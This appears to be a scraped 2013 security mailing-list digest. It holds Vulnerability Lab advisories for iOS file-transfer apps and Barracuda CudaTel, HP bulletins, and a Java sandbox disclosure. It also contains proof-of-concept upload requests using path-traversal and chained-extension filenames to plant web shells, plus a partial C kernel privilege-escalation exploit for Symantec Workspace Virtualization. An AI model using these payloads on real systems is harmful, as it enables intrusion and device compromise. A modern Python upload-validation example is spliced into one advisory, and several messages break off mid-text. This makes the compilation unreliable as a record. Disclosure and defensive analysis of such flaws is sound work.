WiFly 1.0 Pro iOS - Multiple Web Vulnerabilities

2013-07-18 Thread Vulnerability Lab
Title:
==
WiFly 1.0 Pro iOS - Multiple Web Vulnerabilities


Date:
=
2013-07-15


References:
===
http://www.vulnerability-lab.com/get_content.php?id=1011


VL-ID:
=
1011


Common Vulnerability Scoring System:

6.3


Introduction:
=
It is the best solution for transferring photos, songs, documents, movies and 
other files between computer 
and your mobile devices over wireless network. Simply launch application on 
your iOS device and scan QR 
code from http://wifly.me to connect your phone. Drop your files into opened 
page and vice versa!
No cloud or internet access required - no data leaves your local network. Both 
your devices must have access 
to the same LAN or WLAN - no additional network configurations needed. 
Transferred documents can be opened with 
any supported App on your iOS device.

Capabilities:
- Multiple uploads
- Easily Drag & Drop multiple files to WiFly
- Preview pictures in the browser
- Downloading the entire folder to your computer
- Browsing files and folders directly on mobile device
- Exchange files between mobile devices
- Built in preview of images, documents, music and video files

(Copy of the Homepage: https://itunes.apple.com/us/app/wifly-pro/id641092695 )


Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities 
in the WiFly 1.0 Pro application (Apple iOS - iPad & iPhone).


Report-Timeline:

2013-07-15:Public Disclosure (Vulnerability Laboratory)


Status:

Published


Affected Products:
==
Apple AppStore
Product: WiFly Pro 1.0


Exploitation-Technique:
===
Remote


Severity:
=
High


Details:

A local file include and an arbitrary file upload web vulnerability have been 
detected in the WiFly 1.0 Pro application (Apple iOS - iPad & iPhone).

The vulnerabilities are located in the file upload module of the embedded 
web server (http://localhost:4885/) when it processes a manipulated filename 
supplied via POST. The injected file is then accessible through the index 
listing module of the application.

Remote attackers can supply a filename with a double or triple extension via 
the POST method to bypass the upload validation and filter process. After the 
upload, the attacker accesses the file under one extension and swaps it for 
the other to execute, for example, PHP, JS or HTML code.

The application's own filter does not allow a file to be renamed with special 
characters because of an input field restriction. Attackers therefore need 
two different requests: first the file is requested as a URL with the filename 
as a parameter so that it is displayed, and in the second step the file is 
uploaded with the manipulated filename in the POST request.

Exploitation of the vulnerability requires no user interaction, but the victim 
iOS device needs to accept the connection from the other device.
Successful exploitation of the vulnerability results in unauthorized path or 
file access via local file include or arbitrary file upload.

Vulnerable Application(s):
[+] WiFly Pro 1.0 - ITunes or AppStore (Apple)

Vulnerable Module(s):
[+] Upload

Vulnerable File(s):
[+] upload.json & add

Vulnerable Parameter(s):
[+] filename

Affected Module(s):
[+] Index Listing (http://localhost:4885/)


Proof of Concept:
=
The local file/path include and arbitrary file upload vulnerabilities can be 
exploited by remote attackers without user interaction, but the connection 
needs to be accepted by the target system. For demonstration or to reproduce ...

Standard Request:
Content-Disposition: form-data; name=files[]; filename=s2.png\r\nContent-Type: image/png\r\n\r\n?PNG\r\n\n

Status: 200
POST http://192.168.2.104:4885/api/1/upload.json?id_parent=0&size=53025&last_modified=1331091664536000&name=new-image23.png&sessionid=1373658611109

Load Flags[LOAD_BYPASS_CACHE  ] Content Size[118] Mime Type[application/x-unknown-content-type]


PoC: 1.1 - File/Path Include Vulnerability
POST http://192.168.2.104:4885/api/1/upload.json?id_parent=0&size=53025&last_modified=1331091664536000&name=../../[File/Path Include Vulnerability!].png&sessionid=1373658611109
POST_DATA[-27213192708057
Content-Disposition: form-data; name=files[]; filename=../../[File/Path Include Vulnerability!]
Content-Type: image/png


PoC: 1.2 - Arbitrary File Upload Vulnerability
POST http://192.168.2.104:4885/api/1/upload.json?id_parent=0&size=53025&last_modified=1331091664536000&name=[Arbitrary File Upload Vulnerability!].png.gif.html.php.js&sessionid=1373658611109
POST_DATA[-27213192708057
Content-Disposition: form-data; name=files[]; filename=[Arbitrary File Upload Vulnerability!].png.gif.html.php.js
Content-Type: image/png


Solution:

Flux Player v3.1.0 iOS - File Include Arbitrary File Upload Vulnerability

2013-07-18 Thread Vulnerability Lab
Title:
==
Flux Player v3.1.0 iOS - File Include  Arbitrary File Upload Vulnerability



Date:
=
2013-07-16


References:
===
http://www.vulnerability-lab.com/get_content.php?id=1013


VL-ID:
=
1013


Common Vulnerability Scoring System:

7.5


Introduction:
=
With `Flux Player` you can use your iPhone, iPad or iPod touch for download, 
transfer and playback of movies, audio books and music. The movies may be 
transferred from commercial services or products, or alternatively from 
yourself by drag-and-drop with the free `Flux Transfer` PC application.

(Copy of the Vendor Homepage: 
https://itunes.apple.com/en/app/flux-player/id324300572 )


Abstract:
=
The Vulnerability Laboratory Research Team discovered a file include & 
arbitrary file upload vulnerability in the Flux Player 3.1.0 (Apple iOS - iPad 
& iPhone).


Report-Timeline:

2013-07-16:Public Disclosure (Vulnerability Laboratory)


Status:

Published


Affected Products:
==
Apple AppStore
Product: Flux Player - Application 3.1.0


Exploitation-Technique:
===
Remote


Severity:
=
High


Details:

1.1
A file include web vulnerability has been detected in the Flux Player 3.1.0 
application (Apple iOS - iPad & iPhone).
The file include vulnerability allows remote attackers to include (upload) 
local file or path requests to compromise the application or service.

The vulnerability is located in the upload module when it processes uploaded 
files with manipulated names sent via the POST method. The attacker can inject 
local paths or files into the request context and compromise the device. The 
validation has a bad side effect that increases the risk: the attack can be 
combined with persistently injected script code.

Exploitation of the vulnerability requires no user interaction and no 
privileged Flux Player application user account. Successful exploitation of 
the vulnerability results in unauthorized local file and path requests that 
compromise the device or application.

Vulnerable Module(s):
[+] Upload (Files)

Vulnerable Parameter(s):
[+] filename 

Affected Module(s):
[+] Index File Dir Listing



1.2
An arbitrary file upload web vulnerability has been detected in the Flux Player 
3.1.0 application (Apple iOS - iPad & iPhone).
The arbitrary file upload issue allows a remote attacker to upload files with 
multiple extensions to bypass the validation and gain unauthorized access.

The vulnerability is located in the upload module when it processes uploaded 
files with multiple trailing extensions. Attackers are able to upload a PHP 
or JS web shell by renaming the file with multiple extensions: for example, 
the web shell is uploaded under the name picture.jpg.js.php.jpg, and in the 
request after the upload the trailing jpg is dropped so that the malicious 
file (web shell) can be accessed without authorization to compromise the 
web server or mobile device.

Exploitation of the vulnerability requires no user interaction and no 
privileged Flux Player application user account. Successful exploitation of 
the vulnerability results in unauthorized file access, because the device is 
compromised after the upload of a web shell.

Vulnerable Module(s):
[+] Upload (Files)

Vulnerable Parameter(s):
[+] filename (multiple extensions)

Affected Module(s):
[+] Index File Dir Listing
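Both the WiFly and the Flux Player findings above come down to the same root cause: the upload handler trusts the multipart `filename` field, so a `../` component lands outside the upload directory and a chained name such as `picture.jpg.js.php.jpg` passes a last-extension check and is renamed afterwards. The following is an added example (not code from either app or from Vulnerability Lab) of the checks a LAN transfer app's upload endpoint should apply to each multipart part; all function and constant names are hypothetical and the sample parts are constructed from the advisory requests.

```python
"""Upload filename and content validation for a LAN file-transfer web server.

Added example, not code from WiFly, Flux Player or Vulnerability Lab. Every
name here is hypothetical; the sample parts at the bottom are constructed.
"""
import re
import unicodedata

# Allow-list: declared MIME type -> the one extension accepted for it.
# Web-executable types (php, js, html, ...) are simply absent.
ALLOWED = {
    "image/png": "png",
    "image/gif": "gif",
    "image/jpeg": "jpg",
    "application/pdf": "pdf",
}

# Signatures the first bytes must carry for the declared type, so that the
# attacker-controlled Content-Type header is never trusted on its own.
MAGIC = {
    "image/png": b"\x89PNG\r\n\x1a\n",
    "image/gif": b"GIF8",
    "image/jpeg": b"\xff\xd8\xff",
    "application/pdf": b"%PDF-",
}

_UNSAFE = re.compile(r"[^A-Za-z0-9._-]")
_FILENAME = re.compile(r'filename=(?:"([^"]*)"|([^;]*))', re.IGNORECASE)


class RejectedUpload(ValueError):
    """Raised when the part must be refused; the message names the reason."""


def filename_from_disposition(header: str) -> str:
    """Extract the raw filename from a Content-Disposition header value."""
    m = _FILENAME.search(header)
    if not m:
        raise RejectedUpload("no filename in Content-Disposition")
    return (m.group(1) if m.group(1) is not None else m.group(2)).strip()


def sanitize_filename(raw: str) -> str:
    """Return a single safe path component for ``raw`` or raise RejectedUpload.

    Directory separators are refused outright (browsers send a bare name, so
    ``../../x.png`` is an attack, not a client quirk), and the name must have
    exactly one extension, so ``shell.png.php`` fails even though a
    last-extension check would pass it.
    """
    if not raw or any(ord(c) < 0x20 or c == "\x7f" for c in raw):
        raise RejectedUpload("empty name or control characters")
    if "/" in raw or "\\" in raw or raw in (".", ".."):
        raise RejectedUpload("path separators or traversal in filename")
    name = _UNSAFE.sub("_", unicodedata.normalize("NFKC", raw))
    stem, *exts = name.split(".")
    if not stem or len(exts) != 1 or not exts[0]:
        raise RejectedUpload("need exactly one extension: %r" % name)
    return name


def validate_upload(disposition: str, content_type: str, head: bytes) -> str:
    """Validate one multipart part and return the name it may be stored under.

    The extension must match the declared type and the declared type must
    match the bytes actually sent; either mismatch refuses the part.
    """
    name = sanitize_filename(filename_from_disposition(disposition))
    ext = name.rsplit(".", 1)[1].lower()
    if ALLOWED.get(content_type) != ext:
        raise RejectedUpload("extension %s does not match %s" % (ext, content_type))
    if not head.startswith(MAGIC[content_type]):
        raise RejectedUpload("content does not look like %s" % content_type)
    return name


def triage(parts):
    """Map each (disposition, content_type, head) part to its verdict string."""
    verdicts = {}
    for disposition, content_type, head in parts:
        try:
            verdicts[disposition] = "stored as " + validate_upload(disposition, content_type, head)
        except RejectedUpload as exc:
            verdicts[disposition] = "rejected: " + str(exc)
    return verdicts


# Constructed sample parts modelled on the advisory requests above.
PNG_HEAD = b"\x89PNG\r\n\x1a\n\x00\x00\x00\x0dIHDR"
SAMPLE_PARTS = [
    ('form-data; name="files[]"; filename="s2.png"', "image/png", PNG_HEAD),
    ('form-data; name="files[]"; filename="../../etc/hosts.png"', "image/png", PNG_HEAD),
    ('form-data; name="file"; filename="picture.jpg.js.php.jpg"', "image/jpeg", b"\xff\xd8\xff\xe0"),
    ('form-data; name="files[]"; filename="shell.php"', "image/png", PNG_HEAD),
    ('form-data; name="files[]"; filename="page.png"', "image/png", b"<html><script>"),
]

if __name__ == "__main__":
    for part, verdict in triage(SAMPLE_PARTS).items():
        print(part, "->", verdict)
```

Only the first constructed part is stored; the traversal name, the chained-extension name, the mismatched extension and the mislabelled HTML body are each refused with a distinct reason that can be logged.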


Proof of Concept:
=
The local file include and arbitrary file upload vulnerabilities can be 
exploited by remote attackers without a privileged application user account 
and without user interaction. For demonstration or to reproduce ...


1.1
--- Request Session Log 1 - Local File Include ---

Status: 200[OK]

POST http://localhost:8080/ 
Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Content Size[1053] Mime Type[application/x-unknown-content-type]
   Request Headers:
  Host[localhost:8080]
  
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 
Firefox/22.0]
  
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
 
Accept-Language[en-US,en;q=0.5]
  Accept-Encoding[gzip, deflate]
 DNT[1]
  
Referer[http://localhost:8080/]
  Connection[keep-alive]
   
Post Data:
  POST_DATA[-21961286324572
Content-Disposition: form-data; name=file; filename=iframe src=aiframe 
src=var/app/Mobile
Content-Type: image/png
-
--
Status: 200[OK]

GET http://localhost:8080/../var/app/Mobile  [Included File/Path as Filename!]
Load Flags[LOAD_DOCUMENT_URI  ] Content Size[669] Mime Type[application/x-unknown-content-type]
   Request Headers:
  Host[localhost:8080]
  
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 
Firefox/22.0]
  
Accept 

Barracuda CudaTel 2.6.02.04 - Multiple Client Side Cross Site Vulnerabilities (Bug Bounty #17)

2013-07-18 Thread Vulnerability Lab
Title:
==
Barracuda CudaTel 2.6.02.04 - Multiple Client Side Cross Site Vulnerabilities  
(Bug Bounty #17)



Date:
=
2013-07-17


References:
===
http://vulnerability-lab.com/get_content.php?id=779

BARRACUDA NETWORK SECURITY ID: BNSEC-815


VL-ID:
=
779


Common Vulnerability Scoring System:

2.5


Introduction:
=
Designed to enable seamless voice and video communication, the CudaTel 
Communication Server is an easy-to-use, affordable, next-generation phone 
system for businesses. CudaTel Communication Server's enterprise-class 
feature set includes Voice over IP (VoIP) PBX services, conferencing, 
follow-me, automated attendant services, and more, controlled by an 
easy-to-use Web interface. CudaTel Communication Server is compatible with 
any SIP device and provider, and can be pre-configured for use with both 
analog and digital telephone networks. Powerful, Complete Solution: With an 
expansive feature set and no per user or phone licensing fees, the CudaTel 
Communication Server is equipped and priced for organizations of any size. 
Native High Definition audio support and integrated phone line (TDM) hardware 
produce an unparalleled audio experience. VoIP encryption protects calls 
from hackers and digital eavesdroppers.

(Copy of the Vendor Homepage: http://www.cudatel.com )


Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple client side web 
vulnerabilities in Barracuda Networks CudaTel v2.6.002.040 appliance 
application.


Report-Timeline:

2012-11-26: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2012-11-29: Vendor Notification (Barracuda Networks Security Team - Bug 
Bounty Program)
2012-12-01: Vendor Response/Feedback (Barracuda Networks Security Team)
2013-04-07: Vendor Fix/Patch (Barracuda Networks Developer Team) [Manager: 
Dave Farrow]
2012-07-17: Public Disclosure (Vulnerability Laboratory)


Status:

Published


Affected Products:
==
Barracuda Networks
Product: CudaTel - Communication Server 2.6.002.040


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

Multiple client-side input validation vulnerabilities have been detected in 
the Barracuda Networks CudaTel v2.6.002.040 appliance application.
The non-persistent vulnerabilities allow a remote attacker to manipulate 
client-side application requests in the browser.

The first vulnerability (client side) is located in the GUI route module when 
it processes requests with the vulnerable bbx_outbound_route_name parameter in 
the affected listing. The route module allows remote attackers to inject, via 
the bbx_outbound_route_flag_locked parameter, script code that is executed in 
the bbx_outbound_route_name listing.

The second vulnerability (client side) is located in the AJAX - HTML module 
when it processes requests to the vulnerable queues_wall_stub file with the 
ops and opOpenQueueWallboard link parameters. The vulnerability allows remote 
attackers (client side) to change the link of the Queue Monitor Board in 
requests, resulting in a redirect.

The third vulnerability (client side) is located in the exception handling of 
the eventlog module for failed Web login attempts, when it loads the 
manipulated bbx_eventlog_message parameter. The vulnerability allows remote 
attackers to execute their own script code (client side) in the 
queues_wall_stub.html file from the exception-handling location for failed 
Web login attempts.

Exploitation of the vulnerabilities requires a low-privileged application user 
account and medium or high user interaction.
Successful exploitation of the vulnerabilities results in client-side 
phishing, client-side session hijacking, client-side external redirects to 
malware or malicious websites, and client-side manipulation of module context.

Vulnerable Section(s):
[+] GUI - ROUTE
[+] AJAX - HTML
[+] Eventlog

Vulnerable Module(s):
[+] route - Listing
[+] queues_wall_stub - Monitor Queue Link
[+] eventlog - Web login attempt fail 
(Exception Handling) - Listing 

Vulnerable Parameter(s):
[+] bbx_outbound_route_flag_locked & bbx_outbound_route_name
[+] ops & opOpenQueueWallboard
[+] bbx_eventlog_message


Proof of Concept:
=
The client-side input validation vulnerabilities can be exploited by remote 
attackers without a required application user account and with medium or 
high user interaction required. For demonstration or to reproduce ...

1.1
Review: GUI - ROUTE  route - Listing  bbx_outbound_route_flag_locked 
[PARAMETER] bbx_outbound_route_name [LISTING]
- 
bbx_domain_id: 6
bbx_outbound_route_flag_locked: 0
bbx_outbound_route_id: 14

[security bulletin] HPSBST02896 rev.2 - HP StoreVirtual Storage, Remote Unauthorized Access

2013-07-18 Thread security-alert
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c03825537

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03825537
Version: 2

HPSBST02896 rev.2 - HP StoreVirtual Storage, Remote Unauthorized Access

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2013-07-17
Last Updated: 2013-07-17

Potential Security Impact: Remote unauthorized access

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with the HP
StoreVirtual Storage. This vulnerability could be remotely exploited to gain
unauthorized access to the device.

All HP StoreVirtual Storage systems are equipped with a mechanism that allows
HP support to access the underlying operating system if permission and access
is provided by the customer. This functionality cannot be disabled today.

HP StoreVirtual products are storage appliances that use a custom operating
system, LeftHand OS, which is not accessible to the end user. Limited access
is available to the user via the HP StoreVirtual Command-Line Interface
(CLiQ); however, root access is blocked.

Root access may be requested by HP Support in some cases to help customers
resolve complex support issues. To facilitate these cases, a
challenge-response-based one-time password utility is employed by HP Support
to gain root access to systems when the customer has granted permission and
network access to the system. The one-time password utility protects the root
access by preventing repeated access to the system with the same pass phrase.
Root access to the LeftHand OS does not provide access to the user data being
stored on the system.

References: CVE-2013-2352 (SSRT101257)

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
This issue affects LeftHand OS (a.k.a. SAN iQ) software versions 10.5 and
earlier.

HP StoreVirtual device
HP P4300
HP P4500
HP P4300 G2
HP P4500 G2
HP P4800 G2
HP P4900 G2
HP P4000 VSA
HP StoreVirtual 4130
HP StoreVirtual 4330
HP StoreVirtual 4530
HP StoreVirtual 4630
HP StoreVirtual 4730
HP StoreVirtual VSA
LeftHand NSM2060
LeftHand NSM2120
Dell PowerEdge 2950
HP DL320S
IBM System x3650
LeftHand NSM2060 G2
LeftHand NSM2120 G2
LeftHand VSA

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2013-2352(AV:N/AC:L/Au:N/C:N/I:C/A:C)   9.4
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

The Hewlett-Packard Company thanks Joshua Small for reporting this issue to
security-al...@hp.com

RESOLUTION

HP has provided patches to resolve this vulnerability. Please see the table
below to determine which patch applies to the StoreVirtual version being
used.

OS Version                                          Patch
HP LeftHand OS version 10.5                         10152-00
HP LeftHand OS version 10.0                         10151-00
HP P4000 SAN/iQ software versions 9.5 and 9.5.01    25051-00

Note: Systems running HP P4000 SAN/iQ version 9.5.x must install 9.5 Patch
Set 05 before applying patch 25051-00. Installation of patch 25051-00 will
fail if 9.5 Patch Set 05 is not present.

Note: HP Support may still request root access to customer systems in order
to resolve certain support issues.

Patches and release notes may be downloaded using the 9.5 or later CMC. Go to
http://www.hp.com/go/hpsc

Select your specific product. One method to do this is as follows:
Under Browse all HP products, select 'Storage'
Select 'Disk Storage Systems'
Select 'StoreVirtual Storage'
Select 'HP StoreVirtual 4000/LeftHand P4000 Storage'
If you have a HP LeftHand VSA, HP LeftHand P4300 or HP LeftHand P4500
product, select 'HP LeftHand P4000 SAN Solutions'. If you have a HP P4x00 G2
or HP StoreVirtual 4000 product select 'HP StoreVirtual 4000 Storage'.
Select 'Drivers, Software & Firmware' under 'Download Options' in the left
menu.
Select your specific product.
Select your language. Click 'Cross operating system (BIOS, Firmware,
Diagnostics, etc.)'
Click 'Patch' or scroll down to the Patch table. In the Description column
of the Patch table, click the title of the patch:
To download the file, click the 'Download' button.
To read the release notes, click the 'Release Notes' tab.

HISTORY
Version:1 (rev.1) - 9 July 2013 Initial release
Version:2 (rev.2) - 17 July 2013 Documented the released patches, added
LeftHand NSM2120

Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support 

[SE-2012-01] New Reflection API affected by a known 10+ years old attack

2013-07-18 Thread Security Explorations


Hello All,

We discovered yet another indication that the new Reflection API introduced
into Java SE 7 was not the subject of a thorough security review (if any).

A new vulnerability (Issue 69) that was submitted to Oracle today makes
it possible to implement a very classic attack against the Java VM. What is
particularly interesting is that the attack itself has been public
knowledge for at least 10+ years [1]. It's one of those risks one should
protect against in the first place when new features are added to Java at
the core VM level. It is all the more surprising to discover that the
Reflection API introduced in Java SE 7 didn't implement proper protection
against this attack.

Our Proof of Concept code for Issue 69 was confirmed to work with flying
colors under Java SE 7 Update 25 (1.7.0_25-b16) and below. The code makes it
possible to violate a fundamental feature of Java VM security - the safety of
its type system. As a result, a complete and reliable Java security sandbox
bypass can be gained on a vulnerable instance of Oracle's Java SE software.

Oracle's blog post published on May 30, 2013 [2] implies that maintaining
the security-worthiness of Java has been Oracle’s priority following the
acquisition of Sun Microsystems. Oracle's VP goes even further by indicating
that acquired product lines [such as Java SE] were required to conform to
Oracle policies and procedures, including those comprising Oracle Software
Security Assurance [3].

If Oracle had any Software Security Assurance procedures adopted for Java
SE, most of the simple Reflection API flaws along with a known, 10+ years old
attack should have been eliminated prior to the Java SE 7 release. This didn't
happen, thus it is reasonable to assume that Oracle's security policies and
procedures are either not worth much or their implementation is far from
perfect. That thought alone should catch the attention of Oracle customers not
necessarily relying on Java SE, but rather on other Oracle products, which
were likely subject to the very same, questionable Software Security
Assurance policies and procedures as Java SE 7.

--

As for other things, we released technical details and Proof of Concept
code for a previously reported security vulnerability (Issue 61) that got
fixed by Oracle's Java SE CPU in Jun 2013:

http://www.security-explorations.com/materials/SE-2012-01-ORACLE-12.pdf
http://www.security-explorations.com/materials/se-2012-01-61.zip

We also released technical details and Proof of Concept codes for several
(9 in total) IBM Java flaws that were addressed by the company in early
Jul 2013:

http://www.security-explorations.com/materials/SE-2012-01-IBM-2.pdf
http://www.security-explorations.com/materials/se-2012-01-62-68.zip

The above includes details of trivially broken fixes for vulnerabilities
reported to IBM in Sep 2012 (Issues 35-37 and 49). One of the issues is
also a nice illustration of the allowed behavior (Issue 54) for other
than Oracle's Java VM implementations.

Finally, we published information (and some comment) about CVE numbers
assigned by Oracle to vulnerabilities reported by Security Explorations
as part of SE-2012-01 project:

http://www.security-explorations.com/materials/SE-2012-01-CVE_Map.pdf

Thank you.

Best Regards
Adam Gowdiak

-
Security Explorations
http://www.security-explorations.com
We bring security research to the new level
-

References:
[1] Java and Java VM security vulnerabilities and their exploitation techniques,
    Last Stage of Delirium Research Group, http://lsd-pl.net/
[2] Maintaining the security-worthiness of Java is Oracle's priority,
    https://blogs.oracle.com/security/entry/maintaining_the_security_worthiness_of
[3] Oracle Software Security Assurance,
    http://www.oracle.com/us/support/assurance/overview/index.html



Symantec Workspace Virtualization 6.4.1895.0 Local Kernel Mode Privilege Escalation Exploit

2013-07-18 Thread th_decoder
# Symantec Workspace Virtualization 6.4.1895.0 Local Kernel Mode Privilege 
Escalation Exploit
# Date: 2013-7-17
# Author : MJ0011
# Version: Symantec Workspace Virtualization 6.4.1895.0
# Tested on: Windows XP SP3
 
 
DETAILS:

In the NtQueryValueKey hook function of fslx.sys, the driver writes directly 
to the user-supplied ResultLength buffer without any check.
 
 
EXPLOIT CODE:


#include "stdafx.h"
#include <windows.h>
#include <malloc.h>

typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR  Buffer;
} UNICODE_STRING;
typedef UNICODE_STRING *PUNICODE_STRING;
typedef const UNICODE_STRING *PCUNICODE_STRING;

typedef LONG (WINAPI *pNtQueryValueKey)(
    HANDLE KeyHandle,
    PUNICODE_STRING ValueName,
    ULONG KeyValueInformationClass,
    PVOID KeyValueInformation,
    ULONG Length,
    PULONG ResultLength
);

typedef LONG (WINAPI *pNtQueryIntervalProfile)(
    ULONG ProfileSource,
    PULONG Interval
);

typedef LONG (WINAPI *pZwQuerySystemInformation)(
    ULONG SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength
);

/* Query a system information table, doubling the buffer each time the
   call returns STATUS_INFO_LENGTH_MISMATCH (0xC0000004). */
PVOID GetInfoTable(ULONG ATableType)
{
    ULONG mSize = 0x4000;
    PVOID mPtr = NULL;
    LONG status;
    HMODULE hlib = GetModuleHandle("ntdll.dll");
    pZwQuerySystemInformation ZwQuerySystemInformation =
        (pZwQuerySystemInformation)GetProcAddress(hlib, "ZwQuerySystemInformation");
    do
    {
        mPtr = malloc(mSize);
        if (mPtr)
        {
            status = ZwQuerySystemInformation(ATableType, mPtr, mSize, 0);
        }
        else
        {
            return NULL;
        }
        if (status == 0xc0000004)
        {
            free(mPtr);
            mSize = mSize * 2;
        }
    } while (status == 0xc0000004);
    if (status == 0)
    {
        return mPtr;
    }
    free(mPtr);
    return NULL;
}

enum { SystemModuleInformation = 11,
       SystemHandleInformation = 16 };

typedef struct {
    ULONG   Unknown1;
    ULONG   Unknown2;
    PVOID   Base;
    ULONG   Size;
    ULONG   Flags;
    USHORT  Index;
    USHORT  NameLength;
    USHORT  LoadCount;
    USHORT  PathLength;
    CHAR    ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;

typedef struct {
    ULONG   Count;
    SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
 
 
 
 
typedef VOID (WINAPI *PINBV_ACQUIRE_DISPLAY_OWNERSHIP)(VOID);
typedef BOOLEAN (WINAPI *PINBV_RESET_DISPLAY)(VOID);
typedef VOID (WINAPI *PINBV_SOLID_COLOR_FILL)(
 ULONG x1,
 ULONG y1,
 ULONG x2,
 ULONG y2,
 ULONG color
);
typedef ULONG (WINAPI *PINBV_SET_TEXT_COLOR)(
 ULONG Color
);
typedef
VOID
(*INBV_DISPLAY_STRING_FILTER)(
 PUCHAR *Str
);
 
 
typedef VOID (WINAPI *PINBV_INSTALL_DISPLAY_STRING_FILTER)(
INBV_DISPLAY_STRING_FILTER DisplayStringFilter
);
typedef BOOLEAN (WINAPI *PINBV_ENABLE_DISPLAY_STRING)(
BOOLEAN bEnable
);
typedef VOID (WINAPI *PINVB_SET_SCROLL_REGION)(
ULONG x1,
ULONG y1,
ULONG x2,
ULONG y2
);
typedef VOID (WINAPI *PINBV_DISPLAY_STRING)(
PUCHAR Str
);
PINBV_ACQUIRE_DISPLAY_OWNERSHIP InbvAcquireDisplayOwnership = 0 ; 
PINBV_RESET_DISPLAY InbvResetDisplay = 0 ; 
PINBV_SOLID_COLOR_FILL InbvSolidColorFill = 0 ; 
PINBV_SET_TEXT_COLOR InbvSetTextColor = 0 ; 
PINBV_INSTALL_DISPLAY_STRING_FILTER InbvInstallDisplayStringFilter = 0 ; 
PINBV_ENABLE_DISPLAY_STRING InbvEnableDisplayString = 0 ; 
PINVB_SET_SCROLL_REGION InbvSetScrollRegion = 0 ; 
PINBV_DISPLAY_STRING InbvDisplayString= 0 ; 
 
 
#define VGA_COLOR_BLACK 0
#define VGA_COLOR_RED 1
#define VGA_COLOR_GREEN 2
#define VGA_COLOR_GR 3
#define VGA_COLOR_BULE 4
#define VGA_COLOR_DARK_MEGAENTA 5
#define VGA_COLOR_TURQUOISE 6
#define VGA_COLOR_GRAY 7
#define VGA_COLOR_BRIGHT_GRAY 8
#define VGA_COLOR_BRIGHT_RED 9
#define VGA_COLOR_BRIGHT_GREEN 10
#define VGA_COLOR_BRIGHT_YELLOW 11
#define VGA_COLOR_BRIGHT_BULE 12
#define VGA_COLOR_BRIGHT_PURPLE 13
#define VGA_COLOR_BRIGHT_TURQUOISE 14
#define VGA_COLOR_WHITE 15
UCHAR DisplayString[] =
    "= EXPLOIT SUCCESSFULLY\n"
    "Symantec Workspace Virtualization 6.4.1895.0 Local Privilege Escalation Exploit\n"
    "VULNERABLE"

[security bulletin] HPSBMU02900 rev.1 - HP System Management Homepage (SMH) running on Linux and Windows, Multiple Remote and Local Vulnerabilities

2013-07-18 Thread security-alert
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c03839862

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03839862
Version: 1

HPSBMU02900 rev.1 - HP System Management Homepage (SMH) running on Linux and
Windows, Multiple Remote and Local Vulnerabilities

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2013-07-18
Last Updated: 2013-07-18

Potential Security Impact: Local Denial of Service (DoS), remote Denial of
Service (DoS), execution of arbitrary code, gain extended privileges,
disclosure of information, unauthorized access, XSS

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP System
Management Homepage (SMH) running on Linux and Windows. The vulnerabilities
could be exploited remotely resulting in Local Denial of Service (DoS),
remote Denial of Service (DoS), execution of arbitrary code, gain privileges,
disclosure of information, unauthorized access, or XSS.

References:
CVE-2011-3389 (SSRT100740) Remote disclosure of information
CVE-2012-0883 (SSRT101209) Remote gain extended privileges
CVE-2012-2110 (SSRT101210) Remote Denial of Service (DoS)
CVE-2012-2311 (SSRT100992) Remote execution of arbitrary code
CVE-2012-2329 (SSRT100992) Remote Denial of Service (DoS)
CVE-2012-2335 (SSRT100992) Remote execution of arbitrary code
CVE-2012-2336 (SSRT100992) Remote Denial of Service (DoS)
CVE-2013-2355 (SSRT100696) Remote unauthorized Access
CVE-2013-2356 (SSRT100835) Remote disclosure of information
CVE-2013-2357 (SSRT100907) Remote Denial of Service (DoS)
CVE-2013-2358 (SSRT100907) Remote Denial of Service (DoS)
CVE-2013-2359 (SSRT100907) Remote Denial of Service (DoS)
CVE-2013-2360 (SSRT100907) Remote Denial of Service (DoS)
CVE-2013-2361 (SSRT101007) XSS
CVE-2013-2362 (SSRT101076, ZDI-CAN-1676) Local Denial of Service (DoS)
CVE-2013-2363 (SSRT101150) Remote disclosure of information
CVE-2013-2364 (SSRT101151) XSS
CVE-2013-5217 (SSRT101137) Remote unauthorized access

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP System Management Homepage (SMH) v7.2.0 and earlier running on Linux and
Windows.

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2011-3389(AV:N/AC:M/Au:N/C:P/I:N/A:N)   4.3
CVE-2012-0883(AV:L/AC:M/Au:N/C:C/I:C/A:C)   6.9
